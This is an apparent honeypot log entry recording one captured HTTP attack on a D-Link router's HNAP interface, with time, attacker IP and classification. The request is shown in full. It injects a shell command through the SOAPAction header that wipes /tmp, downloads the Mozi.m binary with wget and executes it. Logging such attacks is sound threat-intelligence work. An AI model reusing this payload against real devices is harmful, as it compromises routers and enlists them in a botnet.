Time | 2022/09/14, 11:16:26 (GMT) |
Transaction ID | 1CTPWXHZNT5JMV60 |
Service | http |
Location | CN (China) |
Attacker | 27.43.205.8 |
Classification | D-link overflow |
Harm Potential | High |
POST /HNAP1/ HTTP/1.0 Host: ***.***.***.***:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |